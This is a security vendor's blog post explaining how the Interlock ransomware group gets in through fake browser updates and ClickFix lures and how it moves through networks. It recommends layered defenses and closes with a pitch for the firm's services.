When the FBI and CISA issue a joint cybersecurity advisory specifically warning about a ransomware group, organizations should pay attention. That’s exactly what happened in July 2025 with Interlock ransomware, a threat that has since claimed a large number of victims, including major healthcare providers, city governments, and defense contractors. Despite being around for over a year, it remains highly effective because it exploits lesser-known entry points that many organizations still haven’t secured properly.
What Makes Interlock So Dangerous
Most ransomware arrives through phishing emails containing malicious attachments or deceptive links, but not Interlock.
Instead of sending suspicious emails, attackers often compromise websites that people already trust, such as local news sites, small business pages, or community forums, and inject malicious code. When someone visits, they see what looks like a routine browser update prompt for Chrome or Edge. Click to download, and you’ve just installed malware. This technique is known as a drive-by download, and the FBI specifically noted it’s “uncommon among ransomware groups.”
Interlock also uses a social engineering trick called ClickFix. In this scenario, a user visits a compromised website and sees what appears to be a CAPTCHA verification or an error message claiming something needs to be fixed. The page instructs them to open the Windows Run dialog, paste a command, and press Enter. What they’re actually doing is executing a malicious script. Because the user performs the action themselves, many security tools don’t flag it as a threat.
Once inside, Interlock operators take their time. Researchers have documented dwell times averaging around 17 days before the ransomware is deployed. Here’s what happens during that window:
- Establish persistence: Attackers embed themselves in the system using scheduled tasks and registry modifications so they can maintain access even if the system reboots.
- Harvest credentials: Using keyloggers and stealer malware, they capture passwords and gain access to additional accounts, especially those belonging to administrators.
- Move laterally: They spread through the network via Remote Desktop Protocol to reach servers, backup systems, and domain controllers.
- Steal data: Before encrypting anything, attackers exfiltrate sensitive files to cloud storage they control, often using legitimate tools that blend in with normal business traffic.
- Deploy ransomware: Only after stealing what they need do they disable security tools, delete backups, encrypt the target systems, and demand a ransom in exchange for decryption.
Even if you have reliable backups and can restore operations quickly, attackers can threaten to publish your stolen data unless you pay. The combination of data theft and encryption is known as double extortion, and it’s why many organizations pay the ransom even when they have the ability to perform ransomware data recovery thanks to backups. The potential for regulatory fines, lawsuits, and reputational damage from leaked customer or employee data can far exceed the ransom demand itself.
How to Protect Your Organization from Interlock
Because Interlock relies on tricking users rather than exploiting software vulnerabilities, defense must start with people. But even well-trained employees make mistakes, especially when attackers use highly sophisticated methods. That’s why a strong defense requires multiple layers. When one fails, others can still stop the attack.
Security Awareness Training
Employees need to understand the specific tactics Interlock uses, so training should cover how to recognize fake browser update prompts, why they should never paste commands into the Windows Run dialog regardless of what a website tells them, and how ClickFix attacks disguise themselves as routine CAPTCHAs or error messages. CISA recommends making this training ongoing rather than a one-time event, since attack methods evolve constantly.
Restricting Risky System Features
Disabling the Windows Run dialog through Group Policy removes the primary execution path for ClickFix attacks entirely. Similarly, restricting PowerShell execution to signed scripts prevents malicious commands from running even if someone does fall for the attack.
Endpoint Detection and Response (EDR)
Since Interlock operators often use legitimate remote access tools like AnyDesk and standard Windows utilities to move through networks, traditional antivirus software often misses them. Endpoint Detection and Response (EDR) solutions monitor behavior rather than just scanning for known malware signatures, so they can flag things like unfamiliar connections to an external server or an unusual spike in file access.
Multi-Factor Authentication (MFA)
Multi-Factor Authentication (MFA) remains one of the most effective defenses against lateral movement. Even if attackers harvest passwords through keyloggers, MFA on remote access points, email, and administrative accounts creates an additional barrier they must overcome by requiring a second form of verification, such as a code from an authenticator app or a physical security key.
Network Segmentation
Segmentation limits how far attackers can spread once inside. If your accounting department’s systems are isolated from your production servers, compromising one employee’s workstation doesn’t automatically give access to your entire infrastructure. This also applies to backups, which should be stored on separate, isolated systems that attackers can’t reach through normal network credentials.
Incident Response Planning
Finally, assume that despite your best efforts, an incident could still happen. Having an incident response plan that specifically addresses ransomware (who to call, how to isolate affected systems, when to contact law enforcement) is essential for avoiding costly response mistakes at the worst possible time.
Conclusion
Interlock isn’t going away, and the tactics it uses will only become more common as other ransomware groups adopt similar methods. The good news is that the defenses outlined above work. The challenge for most small and medium businesses is implementing them consistently across the organization while keeping up with day-to-day operations. That’s where we at OSIbeyond can help. Schedule a meeting with our team to assess where your organization stands and what it would take to close the gaps.